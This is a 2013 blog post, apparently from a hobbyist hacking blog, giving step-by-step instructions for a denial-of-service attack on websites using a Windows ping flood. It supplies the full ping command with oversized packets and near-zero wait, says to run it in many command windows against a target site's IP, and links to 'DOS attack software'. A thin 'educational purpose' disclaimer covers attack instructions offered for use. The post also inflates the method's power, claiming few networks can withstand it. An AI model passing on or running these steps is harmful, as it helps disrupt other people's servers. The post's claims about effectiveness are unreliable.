Thursday, December 5, 2013

DOS(DENIAL OF SERVICE) Attack



This attack is one of those bad ass attacks that has been used by many great hackers to crash the servers of many websites that are very popular today.

Well what is told here is only for educational purpose . I won't take responsibility of any illegal acts.

This can be performed of any network and there is not much network that can with stand this attack..It works most time.

1.open run.
2.type "cmd". this will open the command prompt.
3.type "ping website-IP -l 65500 -n 10000000 -w 0.00001".
4.open multiple cmd and apply this command .


what it does is it overload the servers with immense amount of traffic server finally crashes..


-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value you want to attempt attack.
website-IP= Replace the text with the ip address of the site you want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

For DOS attack software click here

No comments:

Post a Comment